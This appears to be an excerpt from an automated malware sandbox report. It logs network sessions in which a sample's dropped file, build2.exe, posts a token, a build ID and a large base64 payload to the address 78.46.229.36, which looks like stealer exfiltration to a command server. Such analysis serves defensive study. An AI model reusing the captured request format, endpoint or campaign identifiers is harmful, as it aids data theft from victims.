                                                                                                                                                                                                                                      2024-03-28 16:52:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 46 48 4a 44 41 41 46 42 41 4b 45 42 47 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 4a 44 41 41 46 42 41 4b 45 42 47 49 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 46 48 4a 44 41 41 46 42 41 4b 45 42 47 49 4a 4b 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------IDBFHJDAAFBAKEBGIJKKContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------IDBFHJDAAFBAKEBGIJKKContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------IDBFHJDAAFBAKEBGIJKKCont
                                                                                                                                                                                                                                      2024-03-28 16:52:12 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:52:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      36192.168.2.64978678.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:13 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HJJJJKEHCAKFBFHJKEHC
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 453
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:13 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------HJJJJKEHCAKFBFHJKEHCContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------HJJJJKEHCAKFBFHJKEHCCont
                                                                                                                                                                                                                                      2024-03-28 16:52:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:52:14 UTC18INData Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8YmxvY2s=0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      37192.168.2.64978778.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC313OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----KJECFHCBKKEBAKFIJDHI
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 132793
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 43 46 48 43 42 4b 4b 45 42 41 4b 46 49 4a 44 48 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------KJECFHCBKKEBAKFIJDHIContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------KJECFHCBKKEBAKFIJDHICont
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 33 43 66 39 2b 4f 4f 6d 34 6e 49 2f 4d 47 76 51 59 36 34 72 78 73 52 2f 62 55 49 2f 36 64 6c 2f 38 41 51 6d 72 36 44 68 53 70 4b 4f 4f 35 45 39 47 6e 63 2b 65 34 6e 70 78 6c 67 75 5a 37 70 6f 35 71 69 69 69 76 30 67 2f 50 67 6f 6f 6f 6f 41 4b 39 43 2b 47 76 2f 48 74 71 50 2b 2f 48 2f 4a 71 38 39 72 30 48 34 62 66 38 65 2b 70 66 37 30 66 38 6d 72 7a 4d 32 2f 33 5a 2b 71 50 59 79 4c 2f 66 46 36 4d 37 75 69 6b 6f 72 35 59 2b 31 43 76 4a 50 47 2f 2f 41 43 4e 74 33 2f 75 78 2f 77 44 6f 43 31 36 31 58 6b 76 6a 66 2f 6b 62 62 7a 36 52 2f 77 44 6f 43 31 36 57 55 2f 37 79 76 52 6e 6a 35 35 2f 75 6a 39 55 63 39 53 55 74 46 66 55 6e 78 59 6c 46 4c 53 55 77 4e 54 77 33 2f 77 41 6a 4c 70 76 2f 41 46 38 4a 2f 4f 76 61 71 38 56 38 4f 66 38 41 49 79 36 62 2f 77 42 66 4b
                                                                                                                                                                                                                                      Data Ascii: 3Cf9+OOm4nI/MGvQY64rxsR/bUI/6dl/8AQmr6DhSpKOO5E9Gnc+e4npxlguZ7po5qiiiv0g/PgooooAK9C+Gv/HtqP+/H/Jq89r0H4bf8e+pf70f8mrzM2/3Z+qPYyL/fF6M7uikor5Y+1CvJPG//ACNt3/ux/wDoC161Xkvjf/kbbz6R/wDoC16WU/7yvRnj55/uj9Uc9SUtFfUnxYlFLSUwNTw3/wAjLpv/AF8J/Ovaq8V8Of8AIy6b/wBfK
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 6b 52 51 63 2b 53 70 53 50 74 32 55 6b 65 2f 66 4e 64 2b 4b 77 31 61 70 43 45 61 65 6c 76 38 30 65 5a 67 63 5a 68 36 4e 53 70 4b 74 72 64 61 61 46 31 62 79 30 6c 30 54 56 64 57 30 2b 46 62 6c 62 50 56 62 74 72 53 31 5a 63 4e 4e 45 71 52 45 45 35 35 4d 61 42 69 35 58 71 52 32 78 75 49 6a 54 55 4c 71 61 65 58 54 4c 59 61 55 68 2f 73 78 62 78 6d 75 6f 41 58 75 57 65 44 7a 58 4b 4d 71 48 5a 74 42 4f 30 41 71 42 74 48 66 4e 4d 62 53 35 6b 6e 74 33 74 62 6f 32 36 32 31 77 31 31 43 49 77 41 55 6c 49 41 4c 5a 78 6b 35 43 67 59 50 46 49 74 6e 71 59 74 6e 74 7a 65 77 46 57 53 53 4e 48 2b 79 78 65 5a 45 6a 35 33 4a 47 2b 33 64 47 76 7a 4e 38 71 6b 41 5a 4f 42 7a 58 45 38 44 6a 49 74 70 4f 36 36 61 2b 58 2b 65 76 38 41 57 6e 65 73 7a 77 45 6b 6d 31 5a 2b 53 38 37 2f
                                                                                                                                                                                                                                      Data Ascii: kRQc+SpSPt2Uke/fNd+Kw1apCEaelv80eZgcZh6NSpKtrdaaF1by0l0TVdW0+FblbPVbtrS1ZcNNEqREE55MaBi5XqR2xuIjTULqaeXTLYaUh/sxbxmuoAXuWeDzXKMqHZtBO0AqBtHfNMbS5knt3tbo2621w11CIwAUlIALZxk5CgYPFItnqYtntzewFWSSNH+yxeZEj53JG+3dGvzN8qkAZOBzXE8DjItpO66a+X+ev8AWneszwEkm1Z+S87/
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 31 4a 38 59 4a 52 52 52 51 4d 4b 36 76 77 68 34 65 73 64 63 67 75 6d 75 2f 4e 42 69 5a 51 76 6c 74 6a 71 44 37 65 31 63 70 58 6f 48 77 34 2f 34 39 39 51 2f 33 30 2f 6b 31 65 64 6d 63 35 51 77 39 34 75 7a 75 6a 31 38 6b 70 77 71 59 74 52 6d 6b 31 5a 37 36 6c 2f 2f 41 49 51 44 52 76 37 31 31 2f 33 38 48 2b 46 4e 2f 77 43 45 42 30 62 2b 2f 64 66 39 2f 42 2f 68 58 56 55 6c 66 4f 66 57 71 2f 38 41 4f 2f 76 5a 39 6c 39 52 77 76 38 41 7a 36 6a 39 79 2f 79 50 4f 64 58 38 48 4a 44 46 63 76 70 78 6b 64 72 65 54 42 6a 63 35 4c 4c 73 56 75 50 66 6b 31 78 35 42 42 77 65 74 65 79 7a 36 59 38 74 78 4c 4c 48 66 54 77 2b 59 51 57 52 46 51 6a 49 41 48 64 53 65 67 46 65 5a 65 4b 4c 59 57 6e 69 47 35 68 44 6c 38 62 53 57 59 41 45 6b 71 43 65 67 41 37 31 36 32 56 34 79 70 4f
                                                                                                                                                                                                                                      Data Ascii: 1J8YJRRRQMK6vwh4esdcgumu/NBiZQvltjqD7e1cpXoHw4/499Q/30/k1edmc5Qw94uzuj18kpwqYtRmk1Z76l//AIQDRv711/38H+FN/wCEB0b+/df9/B/hXVUlfOfWq/8AO/vZ9l9Rwv8Az6j9y/yPOdX8HJDFcvpxkdreTBjc5LLsVuPfk1x5BBweteyz6Y8txLLHfTw+YQWRFQjIAHdSegFeZeKLYWniG5hDl8bSWYAEkqCegA7162V4ypO
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 53 75 44 62 6d 35 61 51 6b 5a 4b 42 39 68 62 72 6e 37 78 78 36 31 66 64 58 69 75 4a 59 4a 55 4b 53 78 4e 73 64 53 51 63 48 38 4f 4b 39 4f 6e 57 6a 4e 4a 58 56 7a 78 4b 32 47 6e 54 62 66 4b 2b 58 75 4c 48 48 4a 4e 4d 73 4d 4d 55 6b 73 72 5a 32 78 78 6f 57 59 34 36 34 41 35 70 38 56 72 64 7a 69 59 77 32 56 33 49 49 48 4b 53 37 4c 64 7a 35 62 44 71 47 77 4f 43 50 51 31 6e 33 61 33 6b 6f 75 49 4c 66 54 72 72 55 59 5a 37 63 78 33 46 76 61 5a 38 37 5a 76 55 68 6b 49 42 77 51 77 58 71 70 48 71 4b 7a 37 32 47 31 73 4e 4c 6b 73 4a 6e 76 39 51 4d 4f 72 33 4d 63 4d 30 4e 77 6b 5a 54 45 45 48 44 67 6f 34 59 6a 4f 30 67 45 59 4b 6e 6d 75 48 45 34 2b 64 47 72 37 4e 4c 74 2b 6e 2b 5a 36 6d 43 79 71 6e 69 4b 48 74 5a 53 74 76 2b 43 39 47 62 6b 71 53 32 39 6d 6c 35 4e 62
                                                                                                                                                                                                                                      Data Ascii: SuDbm5aQkZKB9hbrn7xx61fdXiuJYJUKSxNsdSQcH8OK9OnWjNJXVzxK2GnTbfK+XuLHHJNMsMMUksrZ2xxoWY464A5p8VrdziYw2V3IIHKS7Ldz5bDqGwOCPQ1n3a3kouILfTrrUYZ7cx3FvaZ87ZvUhkIBwQwXqpHqKz72G1sNLksJnv9QMOr3McM0NwkZTEEHDgo4YjO0gEYKnmuHE4+dGr7NLt+n+Z6mCyqniKHtZStv+C9GbkqS29ml5Nb
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 6c 32 46 31 4b 5a 5a 37 4f 43 57 51 39 57 65 4d 45 6d 76 4e 50 46 4d 4d 56 72 34 6a 75 6f 59 49 30 6a 6a 55 4a 68 45 47 41 4d 6f 44 58 71 74 65 57 65 4d 50 38 41 6b 61 62 7a 36 52 2f 2b 67 4c 58 70 5a 56 2f 76 43 39 47 65 4a 78 42 2f 75 54 39 55 59 6d 34 30 6e 4e 48 46 4a 58 30 35 38 49 4c 53 55 55 55 41 61 58 68 2f 2f 6b 59 64 50 2f 36 2b 45 2f 6e 58 73 4e 65 4f 36 42 2f 79 4d 4f 6e 2f 41 50 58 77 6e 38 78 58 73 4e 66 4e 35 78 2f 48 58 70 2b 72 50 74 75 47 2f 77 44 64 5a 66 34 6e 2b 53 43 6f 62 69 32 67 75 34 2f 4c 75 49 55 6c 6a 7a 6e 61 36 35 47 61 6c 6f 72 79 6a 36 41 34 7a 78 72 70 31 6c 5a 36 4a 48 4a 62 57 6b 4d 4c 6d 34 56 53 79 49 41 63 62 57 34 2f 53 75 41 72 30 6a 78 39 2f 77 41 67 43 48 2f 72 35 58 2f 30 46 71 38 33 72 36 54 4a 2f 77 43 41 2f
                                                                                                                                                                                                                                      Data Ascii: l2F1KZZ7OCWQ9WeMEmvNPFMMVr4juoYI0jjUJhEGAMoDXqteWeMP8Akabz6R/+gLXpZV/vC9GeJxB/uT9UYm40nNHFJX058ILSUUUAaXh//kYdP/6+E/nXsNeO6B/yMOn/APXwn8xXsNfN5x/HXp+rPtuG/wDdZf4n+SCobi2gu4/LuIUljzna65Galoryj6A4zxrp1lZ6JHJbWkMLm4VSyIAcbW4/SuAr0jx9/wAgCH/r5X/0Fq83r6TJ/wCA/
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 55 55 41 46 4a 53 30 6c 41 77 6f 6f 6f 6f 41 4b 4b 53 69 6d 68 6f 4b 4b 4b 4f 39 41 43 55 55 55 55 78 69 47 69 6c 70 4b 41 43 69 6b 7a 53 55 44 48 5a 78 53 5a 70 4b 4b 4c 67 42 4e 4a 52 52 51 55 46 4a 52 52 51 41 55 5a 70 4b 4b 42 68 52 53 55 55 41 46 46 47 61 54 4e 41 77 70 44 53 30 6c 41 42 51 61 4d 30 6c 41 77 6f 70 4b 4b 42 68 53 55 74 49 65 74 41 42 53 55 74 4a 52 59 59 55 6c 46 46 4d 59 55 6c 4b 61 53 67 59 55 6c 4b 61 53 67 41 70 4b 4b 4d 30 44 45 70 44 53 6b 30 6c 41 77 70 4b 57 6b 6f 41 4b 53 69 6a 4e 46 68 69 55 68 70 61 53 67 59 55 47 69 6b 6f 47 4a 6d 69 67 30 55 44 51 6c 46 46 46 41 78 4b 44 52 53 55 44 51 5a 70 4b 4f 39 46 41 78 4b 51 30 74 49 61 42 6e 50 2b 4a 2f 38 41 6c 31 2f 34 48 2f 37 4c 58 50 56 30 48 69 66 2f 41 4a 64 66 2b 42 2f 30
                                                                                                                                                                                                                                      Data Ascii: UUAFJS0lAwooooAKKSimhoKKKO9ACUUUUxiGilpKACikzSUDHZxSZpKKLgBNJRRQUFJRRQAUZpKKBhRSUUAFFGaTNAwpDS0lABQaM0lAwopKKBhSUtIetABSUtJRYYUlFFMYUlKaSgYUlKaSgApKKM0DEpDSk0lAwpKWkoAKSijNFhiUhpaSgYUGikoGJmig0UDQlFFFAxKDRSUDQZpKO9FAxKQ0tIaBnP+J/8Al1/4H/7LXPV0Hif/AJdf+B/0
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC16355OUTData Raw: 59 72 70 39 74 63 61 75 77 63 51 74 49 56 6b 32 78 45 2f 4c 76 4c 48 4a 78 74 34 4a 35 36 44 74 51 42 35 35 52 58 63 32 75 6e 2b 47 72 37 56 37 47 4a 55 74 57 62 4e 7a 39 6f 74 72 4e 37 6b 4b 55 57 4a 6d 51 37 70 51 43 47 42 42 42 78 77 65 4f 4f 6f 71 6e 5a 57 32 6d 36 6e 70 62 2f 5a 74 4b 74 45 31 47 56 4a 33 45 45 6b 6c 77 76 79 71 6e 79 74 41 64 78 55 34 32 75 78 44 6b 35 49 77 50 51 41 48 4a 55 55 55 55 41 46 5a 4f 69 66 38 74 2f 38 41 67 50 38 41 57 74 61 73 6e 52 50 2b 57 2f 38 41 77 48 2b 74 41 47 74 55 74 76 62 7a 33 63 36 77 57 30 4d 6b 30 7a 66 64 6a 6a 55 73 78 37 38 41 56 46 56 6e 54 72 36 58 54 4e 53 74 72 36 41 34 6c 74 35 56 6b 58 6e 71 51 63 34 2b 6c 41 44 4c 65 30 75 62 74 6d 57 32 74 35 5a 6d 52 53 37 43 4e 43 78 56 52 31 4a 78 32 35 48
                                                                                                                                                                                                                                      Data Ascii: Yrp9tcauwcQtIVk2xE/LvLHJxt4J56DtQB55RXc2un+Gr7V7GJUtWbNz9otrN7kKUWJmQ7pQCGBBBxweOOoqnZW2m6npb/ZtKtE1GVJ3EEklwvyqnytAdxU42uxDk5IwPQAHJUUUUAFZOif8t/8AgP8AWtasnRP+W/8AwH+tAGtUtvbz3c6wW0Mk0zfdjjUsx78AVFVnTr6XTNStr6A4lt5VkXnqQc4+lADLe0ubtmW2t5ZmRS7CNCxVR1Jx25H
                                                                                                                                                                                                                                      2024-03-28 16:52:15 UTC1953OUTData Raw: 6f 72 7a 35 5a 56 47 70 69 49 31 71 30 6e 4a 52 32 58 54 2f 67 6e 54 68 36 73 71 46 46 30 6f 37 76 64 2f 6f 46 46 46 46 65 71 5a 42 58 54 2b 48 50 45 43 57 6b 58 32 4f 36 62 62 45 44 6d 4e 2f 54 32 4e 52 57 33 67 62 78 4a 64 32 73 4e 7a 42 70 32 2b 47 5a 42 4a 47 33 6e 78 6a 4b 6b 5a 42 77 57 39 4b 6c 2f 77 43 46 65 2b 4b 66 2b 67 58 2f 41 4f 54 45 58 2f 78 56 4b 64 43 56 53 4e 6d 6d 59 31 66 5a 31 49 38 73 6d 65 6d 61 48 34 67 31 4f 36 65 4b 31 74 39 53 48 6b 41 5a 4d 70 43 4d 59 31 48 58 44 6b 45 6a 38 44 55 48 6a 50 34 68 32 4f 6d 36 64 4c 59 61 56 63 72 64 58 30 69 6d 4d 79 49 32 34 52 63 59 4a 4c 64 7a 58 6e 58 2f 41 41 72 33 78 54 2f 30 43 2f 38 41 79 59 69 2f 2b 4b 6f 2f 34 56 37 34 70 2f 36 42 66 2f 6b 78 46 2f 38 41 46 56 35 6c 62 4a 6e 58 71 78
                                                                                                                                                                                                                                      Data Ascii: orz5ZVGpiI1q0nJR2XT/gnTh6sqFF0o7vd/oFFFFeqZBXT+HPECWkX2O6bbEDmN/T2NRW3gbxJd2sNzBp2+GZBJG3nxjKkZBwW9Kl/wCFe+Kf+gX/AOTEX/xVKdCVSNmmY1fZ1I8smemaH4g1O6eK1t9SHkAZMpCMY1HXDkEj8DUHjP4h2Om6dLYaVcrdX0imMyI24RcYJLdzXnX/AAr3xT/0C/8AyYi/+Ko/4V74p/6Bf/kxF/8AFV5lbJnXqx
                                                                                                                                                                                                                                      2024-03-28 16:52:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:52:16 UTC18INData Raw: 38 0d 0a 59 6d 78 76 59 32 73 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8YmxvY2s=0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      38192.168.2.64978878.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:17 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AFBAFBKEGCFBGCBFIDAK
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 41 46 42 4b 45 47 43 46 42 47 43 42 46 49 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------AFBAFBKEGCFBGCBFIDAKContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------AFBAFBKEGCFBGCBFIDAKCont
                                                                                                                                                                                                                                      2024-03-28 16:52:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:17 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:52:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      39192.168.2.64978978.46.229.36443728C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-03-28 16:52:18 UTC310OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJE
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: 78.46.229.36
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-03-28 16:52:18 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 33 63 30 32 34 38 63 31 64 31 33 31 36 36 34 36 64 66 66 61 30 61 37 61 62 35 61 30 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 33 39 65 66 32 62 62 63 64 33 39 66 63 64 35 39 63 35 37 34 36 62 66 65 34 32 33 38 63 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 43 42 46 48 43 46 43 46 42 46 49 45 42 47 48 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="token"5d3c0248c1d1316646dffa0a7ab5a097------HCGCBFHCFCFBFIEBGHJEContent-Disposition: form-data; name="build_id"5739ef2bbcd39fcd59c5746bfe4238c5------HCGCBFHCFCFBFIEBGHJECont
                                                                                                                                                                                                                                      2024-03-28 16:52:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Thu, 28 Mar 2024 16:52:18 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-03-28 16:52:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:17:49:46
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\6uVlPQSJ4e.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\6uVlPQSJ4e.exe"
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:265'216 bytes
